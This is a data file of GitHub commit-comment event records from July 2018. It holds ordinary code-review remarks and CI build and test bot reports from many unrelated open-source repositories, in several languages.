{"id":"7972693527","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"alexfelipe/teste-android-mock"},"payload":{"comment":{"id":29725846,"position":51,"line":51,"path":"app/src/main/java/br/com/alura/leilao/ui/recyclerview/adapter/ListaUsuarioAdapter.java","commit_id":"00b774b41ec304ba5954ef88719d7dbf0dfb2055","created_at":"2018-07-16T20:11:10Z","updated_at":"2018-07-16T20:11:10Z","author_association":"NONE","body":"Pelo que eu vi o ideal seria scrollar a tela para o usuário que foi adicionado por último"}},"created_at":"2018-07-16T20:11:10Z"}
{"id":"7972697880","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"Ad1n/Black_Jack"},"payload":{"comment":{"id":29725856,"position":27,"line":25,"path":"deck.rb","commit_id":"343a2f37593fa76d96d6a0b790d492908abb15cb","created_at":"2018-07-16T20:12:03Z","updated_at":"2018-07-16T20:12:03Z","author_association":"NONE","body":"Если метод не используется извне, а только внутри класса, не забывай помещать его в private.\r\nОткрытым оставляем только \"интерфейс\" класса"}},"created_at":"2018-07-16T20:12:03Z"}
{"id":"7972701083","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29725858,"position":null,"line":null,"path":null,"commit_id":"24719af6ae034b9b909363f0340a313f74ae23f8","created_at":"2018-07-16T20:12:42Z","updated_at":"2018-07-16T20:12:42Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 537](https://ci.hashicorp.engineering/viewLog.html?buildId=104289&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:09:26"}},"created_at":"2018-07-16T20:12:42Z"}
{"id":"7972705388","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"alexfelipe/teste-android-mock"},"payload":{"comment":{"id":29725862,"position":11,"line":63,"path":"app/src/main/java/br/com/alura/leilao/ui/recyclerview/adapter/ListaUsuarioAdapter.java","commit_id":"432a2833be485040cfed5d3afb8d15d2d7032494","created_at":"2018-07-16T20:13:33Z","updated_at":"2018-07-16T20:13:33Z","author_association":"NONE","body":"Por que protected nestes casos?"}},"created_at":"2018-07-16T20:13:33Z"}
{"id":"7972711714","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29725875,"position":null,"line":null,"path":null,"commit_id":"b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a","created_at":"2018-07-16T20:14:51Z","updated_at":"2018-07-16T20:14:51Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - Win64-Windows-7-VisualStudio-14: OK (2942 of 2943 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-16T20:14:51Z"}
{"id":"7972711772","type":"CommitCommentEvent","actor":{"login":"mbharti1"},"repo":{"name":"awslabs/aws-config-rules"},"payload":{"comment":{"id":29725876,"position":null,"line":null,"path":null,"commit_id":"7493677d0a165436c21a03f2fdc156c9475b2dc2","created_at":"2018-07-16T20:14:51Z","updated_at":"2018-07-16T20:14:51Z","author_association":"NONE","body":"can you please help us with the code which is having more than one security group because the rule is getting non-compliant with the instance having more than one security group"}},"created_at":"2018-07-16T20:14:51Z"}
{"id":"7972716438","type":"CommitCommentEvent","actor":{"login":"alexhayter"},"repo":{"name":"alexhayter/PieShop"},"payload":{"comment":{"id":29725884,"position":null,"line":null,"path":null,"commit_id":"ecec9b2e970641f19d68a8ef5e98d7ec8c92a8b7","created_at":"2018-07-16T20:15:47Z","updated_at":"2018-07-16T20:15:47Z","author_association":"OWNER","body":"Just startingh"}},"created_at":"2018-07-16T20:15:47Z"}
{"id":"7972717019","type":"CommitCommentEvent","actor":{"login":"TheSharpReport"},"repo":{"name":"TheSharpReport/hello-world2"},"payload":{"comment":{"id":29725886,"position":2,"line":2,"path":"README.md","commit_id":"8236b79831b8e7ad7ec3f33505b09c5c077bb32c","created_at":"2018-07-16T20:15:54Z","updated_at":"2018-07-16T20:15:54Z","author_association":"OWNER","body":"Practicing merging a different branch."}},"created_at":"2018-07-16T20:15:54Z"}
{"id":"7972720533","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29725896,"position":null,"line":null,"path":null,"commit_id":"25d7f7523c205769be70b7de4467b13ef36212e2","created_at":"2018-07-16T20:16:37Z","updated_at":"2018-07-16T20:16:37Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-35](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-35).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-35-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-16T20:16:37Z"}
{"id":"7972721024","type":"CommitCommentEvent","actor":{"login":"hvlad"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29725899,"position":5,"line":66,"path":"src/msgs/messages2.sql","commit_id":"32ca23b4fc17d01c09e6400a41e313163ee4559a","created_at":"2018-07-16T20:16:43Z","updated_at":"2018-07-16T20:16:43Z","author_association":"MEMBER","body":"I made a quick review of change log of messages2.sql for the last 5 years. And found just two cases when number of parameters was changed. Both cases was about recently added messages."}},"created_at":"2018-07-16T20:16:43Z"}
{"id":"7972725477","type":"CommitCommentEvent","actor":{"login":"TheBizzle"},"repo":{"name":"NetLogo/NetLogo"},"payload":{"comment":{"id":29725908,"position":9,"line":308,"path":"netlogo-gui/src/main/compile/prim/LegacyPrims.scala","commit_id":"5c036b2f24de3cd45eb5722d18c4966f0ff7cd4e","created_at":"2018-07-16T20:17:35Z","updated_at":"2018-07-16T20:17:35Z","author_association":"MEMBER","body":"@mrerrormessage, have you any insight into why this new prim was implemented in `LegacyPrims`, and not dropped into `org.nlogo.prim.etc` with the rest of the plotting prims?"}},"created_at":"2018-07-16T20:17:35Z"}
{"id":"7972727518","type":"CommitCommentEvent","actor":{"login":"MayaLekova"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29725912,"position":11,"line":48,"path":"deps/v8/src/runtime/runtime-promise.cc","commit_id":"84a448f0d0df4ea263da0b54c55b4882c9561bf9","created_at":"2018-07-16T20:17:59Z","updated_at":"2018-07-16T20:17:59Z","author_association":"CONTRIBUTOR","body":"This one and line 58 should be\r\n`return isolate->heap()->undefined_value()`."}},"created_at":"2018-07-16T20:17:59Z"}
{"id":"7972730693","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29725919,"position":null,"line":null,"path":null,"commit_id":"1f061b43f649e115558060b1aaf58acdd5783806","created_at":"2018-07-16T20:18:38Z","updated_at":"2018-07-16T20:18:38Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-MacOS-10.9-clang: OK (2945 of 2945 tests passed, 623 test warnings)\n\nMessages:\n\n * 623 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1f061b43f649e115558060b1aaf58acdd5783806-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1f061b43f649e115558060b1aaf58acdd5783806-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-16T20:18:38Z"}
{"id":"7972742482","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":29725951,"position":null,"line":null,"path":null,"commit_id":"9e545543166b4d6139dd6ed4e3cc185db9415c47","created_at":"2018-07-16T20:21:03Z","updated_at":"2018-07-16T20:21:03Z","author_association":"CONTRIBUTOR","body":"@jmcphers should we consider marking this for a potential future v1.1 patch release? (doesn't meet the bar for us to build one immediately but worth keeping this along if we do produce a later build)"}},"created_at":"2018-07-16T20:21:03Z"}
{"id":"7972742827","type":"CommitCommentEvent","actor":{"login":"liushh"},"repo":{"name":"wizeline/BigQuery-Python"},"payload":{"comment":{"id":29725954,"position":12,"line":1014,"path":"bigquery/tests/test_query_builder.py","commit_id":"5145a8a6df2b86d3e315cf3e059163a7d63a1650","created_at":"2018-07-16T20:21:07Z","updated_at":"2018-07-16T20:21:07Z","author_association":"COLLABORATOR","body":"why do we import for each function? Cycle import?"}},"created_at":"2018-07-16T20:21:07Z"}
{"id":"7972743343","type":"CommitCommentEvent","actor":{"login":"gwolf2u"},"repo":{"name":"crdroidandroid/android_vendor_crDroidOTA"},"payload":{"comment":{"id":29725957,"position":null,"line":null,"path":null,"commit_id":"ecd91325c19b394acb1f25d58a11eae10288ff81","created_at":"2018-07-16T20:21:13Z","updated_at":"2018-07-16T20:21:13Z","author_association":"MEMBER","body":"and now we got 73 devices supported 👍 \r\nhttps://crdroid.net/"}},"created_at":"2018-07-16T20:21:13Z"}
{"id":"7972750322","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29725970,"position":null,"line":null,"path":null,"commit_id":"e9ec524c4e7cb739f44d262abb05c2296ca2b68b","created_at":"2018-07-16T20:22:32Z","updated_at":"2018-07-16T20:22:32Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-4](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-4-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-16T20:22:32Z"}
{"id":"7972750344","type":"CommitCommentEvent","actor":{"login":"willowhaus"},"repo":{"name":"willowhaus/jamf-ruby-tools"},"payload":{"comment":{"id":29725971,"position":null,"line":null,"path":null,"commit_id":"920e3326fb2f38b320c0d0283d68b888707def52","created_at":"2018-07-16T20:22:32Z","updated_at":"2018-07-16T20:22:32Z","author_association":"OWNER","body":"Added variable for port number, defaulting to the standard jamf port."}},"created_at":"2018-07-16T20:22:32Z"}
{"id":"7972755702","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"freemint/gemlib"},"payload":{"comment":{"id":29725977,"position":7,"line":61,"path":"gemlib/Makefile","commit_id":"68407efda7ba55265574c795059d8b5a70b15694","created_at":"2018-07-16T20:23:39Z","updated_at":"2018-07-16T20:23:39Z","author_association":"CONTRIBUTOR","body":"Oh, didn't notice that when changing it. It's not causing failures, but CRs are always an issue when trying to apply patches, merge PRs etc. Fixed now, also on several other files."}},"created_at":"2018-07-16T20:23:39Z"}
{"id":"7972756858","type":"CommitCommentEvent","actor":{"login":"liushh"},"repo":{"name":"wizeline/BigQuery-Python"},"payload":{"comment":{"id":29725978,"position":50,"line":1052,"path":"bigquery/tests/test_query_builder.py","commit_id":"5145a8a6df2b86d3e315cf3e059163a7d63a1650","created_at":"2018-07-16T20:23:54Z","updated_at":"2018-07-16T20:23:54Z","author_association":"COLLABORATOR","body":"There are multiple different cases here. Can we break it down into different test cases?\r\n\r\n`test_bind_boolean_argument`, `test_bind_number_argument` and so on...."}},"created_at":"2018-07-16T20:23:54Z"}
{"id":"7972758507","type":"CommitCommentEvent","actor":{"login":"seth-p"},"repo":{"name":"dcherian/xarray"},"payload":{"comment":{"id":29725983,"position":null,"line":null,"path":null,"commit_id":"5be3ff484e1d9cc849c998cabf0e94dbc4877c5a","created_at":"2018-07-16T20:24:14Z","updated_at":"2018-07-16T20:24:14Z","author_association":"NONE","body":"I replaced my PR with https://github.com/pydata/xarray/pull/2293."}},"created_at":"2018-07-16T20:24:14Z"}
{"id":"7972758543","type":"CommitCommentEvent","actor":{"login":"KonoromiHimaries"},"repo":{"name":"KonoromiHimaries/PolishSubFilters"},"payload":{"comment":{"id":29725984,"position":null,"line":null,"path":null,"commit_id":"294bec44300445cc73ff091a7d3e4b307b2b01f2","created_at":"2018-07-16T20:24:14Z","updated_at":"2018-07-16T20:24:14Z","author_association":"OWNER","body":"https://github.com/azet12/KAD/issues/649"}},"created_at":"2018-07-16T20:24:14Z"}
{"id":"7972782996","type":"CommitCommentEvent","actor":{"login":"juancampa"},"repo":{"name":"aranajhonny/membrane-driver-gmail"},"payload":{"comment":{"id":29726022,"position":12,"line":270,"path":"index.js","commit_id":"42a4d4e65d2cd99463d3ef3ba371770282080b2a","created_at":"2018-07-16T20:29:10Z","updated_at":"2018-07-16T20:29:10Z","author_association":"NONE","body":"We need a not-so-generic name for the topic, otherwise it'll clash with other drivers. For now something like \"membrane-driver-gmail\" would work. Later I can pass the program instance's ID which we can append"}},"created_at":"2018-07-16T20:29:10Z"}
{"id":"7972783080","type":"CommitCommentEvent","actor":{"login":"charris"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29726023,"position":null,"line":null,"path":null,"commit_id":"52289b6b8f1f0907c44f8006128c514ff6f2dce7","created_at":"2018-07-16T20:29:10Z","updated_at":"2018-07-16T20:29:10Z","author_association":"CONTRIBUTOR","body":"@matthew-brett Curious as to what this does."}},"created_at":"2018-07-16T20:29:10Z"}
{"id":"7972785908","type":"CommitCommentEvent","actor":{"login":"AliMaulana"},"repo":{"name":"AliMaulana/alimaulana.github.io"},"payload":{"comment":{"id":29726031,"position":null,"line":null,"path":null,"commit_id":"27f8e019d692bc9e449ef2c6a45906a5ee8f227c","created_at":"2018-07-16T20:29:44Z","updated_at":"2018-07-16T20:29:44Z","author_association":"OWNER","body":"![img_0924](https://user-images.githubusercontent.com/41205889/42781919-a2bfce76-8971-11e8-9be5-65b974e4cb1e.PNG)\r\n"}},"created_at":"2018-07-16T20:29:44Z"}
{"id":"7972786088","type":"CommitCommentEvent","actor":{"login":"juancampa"},"repo":{"name":"aranajhonny/membrane-driver-gmail"},"payload":{"comment":{"id":29726032,"position":43,"line":293,"path":"index.js","commit_id":"42a4d4e65d2cd99463d3ef3ba371770282080b2a","created_at":"2018-07-16T20:29:47Z","updated_at":"2018-07-16T20:29:47Z","author_association":"NONE","body":"hard-coded"}},"created_at":"2018-07-16T20:29:47Z"}
{"id":"7972786604","type":"CommitCommentEvent","actor":{"login":"OSANEBI"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29726033,"position":null,"line":null,"path":null,"commit_id":"05190298d7e6a7de21e3beb8f940e133fea67b4c","created_at":"2018-07-16T20:29:53Z","updated_at":"2018-07-16T20:29:53Z","author_association":"NONE","body":"The app was not crashing on the Emulator, so I ran it on an actual device and it did work perfectly.\r\nAlthough I think I really need to study the codes very well to really understand it.\r\nGreat work everyone involved in this networking course."}},"created_at":"2018-07-16T20:29:53Z"}
{"id":"7972787147","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"hcodes/yaspeller"},"payload":{"comment":{"id":29726034,"position":null,"line":null,"path":null,"commit_id":"f354b3f06d7635d38c6e7f7674f31dfdca5ba55d","created_at":"2018-07-16T20:30:00Z","updated_at":"2018-07-16T20:30:00Z","author_association":"NONE","body":"I am talking about `//` and `/**/`. Can't we limit the scan to the comments?"}},"created_at":"2018-07-16T20:30:00Z"}
{"id":"7972787584","type":"CommitCommentEvent","actor":{"login":"jmcphers"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":29726036,"position":null,"line":null,"path":null,"commit_id":"9e545543166b4d6139dd6ed4e3cc185db9415c47","created_at":"2018-07-16T20:30:06Z","updated_at":"2018-07-16T20:30:06Z","author_association":"MEMBER","body":"Does this fix the signature tooltips too?"}},"created_at":"2018-07-16T20:30:06Z"}
{"id":"7972788964","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29726042,"position":null,"line":null,"path":null,"commit_id":"90362ac7f3f9cd035d0d0350f85f6083990a0e4c","created_at":"2018-07-16T20:30:21Z","updated_at":"2018-07-16T20:30:21Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-50](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-50).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-50-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T20:30:21Z"}
{"id":"7972789378","type":"CommitCommentEvent","actor":{"login":"juancampa"},"repo":{"name":"aranajhonny/membrane-driver-gmail"},"payload":{"comment":{"id":29726043,"position":2,"line":2,"path":"index.js","commit_id":"42a4d4e65d2cd99463d3ef3ba371770282080b2a","created_at":"2018-07-16T20:30:26Z","updated_at":"2018-07-16T20:30:26Z","author_association":"NONE","body":"Nvm, this is fine"}},"created_at":"2018-07-16T20:30:26Z"}
{"id":"7972791968","type":"CommitCommentEvent","actor":{"login":"Eckankar"},"repo":{"name":"diku-dk/openbanko"},"payload":{"comment":{"id":29726047,"position":null,"line":null,"path":null,"commit_id":"9b0fd0526eceead437ca8af22db35682dbba0abb","created_at":"2018-07-16T20:30:57Z","updated_at":"2018-07-16T20:30:57Z","author_association":"COLLABORATOR","body":"@nqpz spiller bare på flere plader."}},"created_at":"2018-07-16T20:30:57Z"}
{"id":"7972793916","type":"CommitCommentEvent","actor":{"login":"juancampa"},"repo":{"name":"aranajhonny/membrane-driver-gmail"},"payload":{"comment":{"id":29726052,"position":8,"line":8,"path":"pubsub.js","commit_id":"42a4d4e65d2cd99463d3ef3ba371770282080b2a","created_at":"2018-07-16T20:31:21Z","updated_at":"2018-07-16T20:31:21Z","author_association":"NONE","body":"indent with 2 spaces"}},"created_at":"2018-07-16T20:31:21Z"}
{"id":"7972794040","type":"CommitCommentEvent","actor":{"login":"dannyroberts"},"repo":{"name":"dimagi/commcare-cloud"},"payload":{"comment":{"id":29726053,"position":4,"line":5,"path":"requirements.txt","commit_id":"68aca9bd04ee4fc28774c449e4d784b19a25613e","created_at":"2018-07-16T20:31:22Z","updated_at":"2018-07-16T20:31:22Z","author_association":"MEMBER","body":"I'm really not sure why I added this—it doesn't appear to be used anywhere and certainly isn't related to the other change in this PR."}},"created_at":"2018-07-16T20:31:22Z"}
{"id":"7972794579","type":"CommitCommentEvent","actor":{"login":"domoritz"},"repo":{"name":"vega/vega-parser"},"payload":{"comment":{"id":29726054,"position":null,"line":null,"path":null,"commit_id":"b534e9f4025e3df98e39ba38ec45984ca787de76","created_at":"2018-07-16T20:31:29Z","updated_at":"2018-07-16T20:31:29Z","author_association":"MEMBER","body":"I updated the vega typings in https://github.com/vega/vega-typings/commit/27c057847e60d8d6303a2a19d265f300f3b97d2e"}},"created_at":"2018-07-16T20:31:29Z"}
{"id":"7972795898","type":"CommitCommentEvent","actor":{"login":"yairm210"},"repo":{"name":"Smashfanful/UnCiv"},"payload":{"comment":{"id":29726058,"position":null,"line":null,"path":null,"commit_id":"810ffee7b0cc544fa18a68390165cfd74383a972","created_at":"2018-07-16T20:31:44Z","updated_at":"2018-07-16T20:31:44Z","author_association":"NONE","body":"You need to submit a merge request to me so that the changes will be merged =)"}},"created_at":"2018-07-16T20:31:44Z"}
{"id":"7972800043","type":"CommitCommentEvent","actor":{"login":"BEWARETHE"},"repo":{"name":"BEWARETHE/BewareThe.github.io"},"payload":{"comment":{"id":29726063,"position":1,"line":1,"path":"CNAME","commit_id":"34cb2a21a40435474267f3e85fa6f4038c3fa7ae","created_at":"2018-07-16T20:32:33Z","updated_at":"2018-07-16T20:32:33Z","author_association":"OWNER","body":"jh"}},"created_at":"2018-07-16T20:32:33Z"}
{"id":"7972801689","type":"CommitCommentEvent","actor":{"login":"masyagin1998"},"repo":{"name":"masyagin1998/SchoolServer"},"payload":{"comment":{"id":29726068,"position":null,"line":null,"path":null,"commit_id":"f38072ca750de28195e3e16d60804ea5353aacc5","created_at":"2018-07-16T20:32:51Z","updated_at":"2018-07-16T20:32:51Z","author_association":"OWNER","body":"@andWhatShouldISay  когда ты научишься делать Go'шный комментарии?\r\n"}},"created_at":"2018-07-16T20:32:51Z"}
{"id":"7972801808","type":"CommitCommentEvent","actor":{"login":"juancampa"},"repo":{"name":"aranajhonny/membrane-driver-gmail"},"payload":{"comment":{"id":29726069,"position":8,"line":8,"path":"pubsub.js","commit_id":"42a4d4e65d2cd99463d3ef3ba371770282080b2a","created_at":"2018-07-16T20:32:52Z","updated_at":"2018-07-16T20:32:52Z","author_association":"NONE","body":"Hmm nvm. I guess once we approve the change you can run prettier on it."}},"created_at":"2018-07-16T20:32:52Z"}
{"id":"7972801993","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29726070,"position":21,"line":84,"path":"Applications/spire/source/time_and_sales/time_and_sales_properties_dialog.cpp","commit_id":"136964d89d6b4d7dfdb58dc64e246499aa4e15db","created_at":"2018-07-16T20:32:55Z","updated_at":"2018-07-16T20:32:55Z","author_association":"COLLABORATOR","body":"Remove the blank line."}},"created_at":"2018-07-16T20:32:55Z"}
{"id":"7972804328","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29726074,"position":null,"line":null,"path":null,"commit_id":"714166b18fb466a5835970246817a708ffbecc49","created_at":"2018-07-16T20:33:21Z","updated_at":"2018-07-16T20:33:21Z","author_association":"COLLABORATOR","body":"Puzzle `695-0fdf56a1` disappeared from [`src/main/java/ru/mystamps/web/service/SeriesInfoExtractorServiceImpl.java`](https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/SeriesInfoExtractorServiceImpl.java), that's why I closed #860. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-16T20:33:21Z"}
{"id":"7972804393","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29726075,"position":null,"line":null,"path":null,"commit_id":"714166b18fb466a5835970246817a708ffbecc49","created_at":"2018-07-16T20:33:22Z","updated_at":"2018-07-16T20:33:22Z","author_association":"COLLABORATOR","body":"Puzzle `695-2a031cd8` disappeared from [`src/main/java/ru/mystamps/web/service/SeriesInfoExtractorServiceImpl.java`](https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/SeriesInfoExtractorServiceImpl.java), that's why I closed #864. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-16T20:33:22Z"}
{"id":"7972807904","type":"CommitCommentEvent","actor":{"login":"e-corp-sam-sepiol"},"repo":{"name":"e-corp-sam-sepiol/vertnode"},"payload":{"comment":{"id":29726081,"position":null,"line":null,"path":null,"commit_id":"f6217e005f077fe526b76b4d619b49c3e99a6d15","created_at":"2018-07-16T20:34:05Z","updated_at":"2018-07-16T20:34:05Z","author_association":"OWNER","body":"1.) added environment variable to be added to .bashrc for persistence across reboots\r\n2.) begin building install_lit function"}},"created_at":"2018-07-16T20:34:05Z"}
{"id":"7972810415","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29726085,"position":70,"line":70,"path":"pom.xml","commit_id":"bb20f4d6ffac9776d7081aa428d6bbfe90e77d02","created_at":"2018-07-16T20:34:33Z","updated_at":"2018-07-16T20:34:33Z","author_association":"NONE","body":"А точно это нужно?"}},"created_at":"2018-07-16T20:34:33Z"}
{"id":"7972811564","type":"CommitCommentEvent","actor":{"login":"maikolweb"},"repo":{"name":"maikolweb/prueba"},"payload":{"comment":{"id":29726088,"position":3,"line":3,"path":"README.md","commit_id":"fcfd349d70f6cab32a38a58b50b26a8767564165","created_at":"2018-07-16T20:34:47Z","updated_at":"2018-07-16T20:34:47Z","author_association":"OWNER","body":"PRUEBADE"}},"created_at":"2018-07-16T20:34:47Z"}
{"id":"7972815936","type":"CommitCommentEvent","actor":{"login":"zixsen"},"repo":{"name":"zixsen/raidboss"},"payload":{"comment":{"id":29726098,"position":null,"line":null,"path":null,"commit_id":"e66014b0e63656d52bf8342dcbc60d82de1acf5a","created_at":"2018-07-16T20:35:38Z","updated_at":"2018-07-16T20:35:38Z","author_association":"OWNER","body":"Added tts and text for the Zombie Breath after all the AoEs"}},"created_at":"2018-07-16T20:35:38Z"}
{"id":"7972816995","type":"CommitCommentEvent","actor":{"login":"ypong-aventador"},"repo":{"name":"ypong-aventador/ResetDevice42Data"},"payload":{"comment":{"id":29726102,"position":null,"line":null,"path":null,"commit_id":"0a3b9007836e5505db307a82739fef369604d077","created_at":"2018-07-16T20:35:52Z","updated_at":"2018-07-16T20:35:52Z","author_association":"OWNER","body":"Replaced default script username/password values from original"}},"created_at":"2018-07-16T20:35:52Z"}
{"id":"7972819050","type":"CommitCommentEvent","actor":{"login":"dnschneid"},"repo":{"name":"dnschneid/crouton"},"payload":{"comment":{"id":29726106,"position":null,"line":null,"path":null,"commit_id":"8446c5fd61faa0bcc0f876ef42786567dd0464f2","created_at":"2018-07-16T20:36:16Z","updated_at":"2018-07-16T20:36:16Z","author_association":"OWNER","body":"Try deleting that partially-created chroot and installing with the latest crouton."}},"created_at":"2018-07-16T20:36:16Z"}
{"id":"7972819076","type":"CommitCommentEvent","actor":{"login":"MarkoTotti"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29726107,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-16T20:36:16Z","updated_at":"2018-07-16T20:36:16Z","author_association":"NONE","body":"@RyanFlemming\r\n\r\nFirst of all, thanks for your help! ...and sorry for my bad english...:)\r\n\r\nSo...I didn't work with seed data, because I was following video instructions and work with migrations (database-first).\r\n\r\nHere are my screenshots (meanwhile, I've hardcoded two cells with date of birthdate, updated database and nothing has changed...there is the same error...)\r\n\r\n![1](https://user-images.githubusercontent.com/41204964/42782162-60d99f74-8948-11e8-8597-ae081fee82ff.jpg)\r\n\r\n![2](https://user-images.githubusercontent.com/41204964/42782216-814d814e-8948-11e8-9a76-0753c3bcac39.jpg)\r\n\r\n"}},"created_at":"2018-07-16T20:36:16Z"}
{"id":"7972822190","type":"CommitCommentEvent","actor":{"login":"matthew-brett"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29726110,"position":null,"line":null,"path":null,"commit_id":"52289b6b8f1f0907c44f8006128c514ff6f2dce7","created_at":"2018-07-16T20:36:53Z","updated_at":"2018-07-16T20:36:53Z","author_association":"CONTRIBUTOR","body":"Sorry - I forgot that we were building a dual-architecture wheel, 32 and 64 bit, and therefore, we need dual architecture OpenBLAS libraries.  I have a script to do that at https://github.com/MacPython/openblas-libs/blob/master/scripts/fuse_openblas.py but it has to be edited and run by hand.  I should automate it, I guess, but I was vaguely hoping we could give up on dual architecture soon."}},"created_at":"2018-07-16T20:36:53Z"}
{"id":"7972823307","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29726112,"position":null,"line":null,"path":null,"commit_id":"82d84365d9e79f360037ebf1dcfc5d8756436d8b","created_at":"2018-07-16T20:37:06Z","updated_at":"2018-07-16T20:37:06Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-16T20:37:06Z"}
{"id":"7972823495","type":"CommitCommentEvent","actor":{"login":"juancampa"},"repo":{"name":"aranajhonny/membrane-driver-gmail"},"payload":{"comment":{"id":29726113,"position":6,"line":9,"path":"config.js","commit_id":"42a4d4e65d2cd99463d3ef3ba371770282080b2a","created_at":"2018-07-16T20:37:08Z","updated_at":"2018-07-16T20:37:08Z","author_association":"NONE","body":"I think we can replace these 3 with `\"SERVICE_ACCOUNT_JSON\"`:\r\nhttps://github.com/juancampa/membrane-drive-container-builder/blob/master/config.json#L4-L7\r\n\r\nIt has all that info and you can quickly download it from the Google Cloud IAM console"}},"created_at":"2018-07-16T20:37:08Z"}
